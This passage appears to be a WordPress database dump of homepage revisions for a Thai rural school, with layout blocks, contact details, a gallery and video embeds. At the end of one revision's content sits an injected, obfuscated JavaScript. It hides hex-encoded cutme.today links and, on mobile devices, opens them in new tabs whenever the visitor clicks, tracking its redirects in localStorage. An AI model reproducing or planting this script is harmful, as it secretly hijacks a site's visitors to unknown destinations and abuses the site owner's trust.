{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 045-660157</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:27:54','2024-07-27 05:27:54','',14,'http://pakhaeng.ssk.in.th/?p=157',0,'revision','',0),
(158,1,'2024-07-27 12:29:51','2024-07-27 05:29:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls 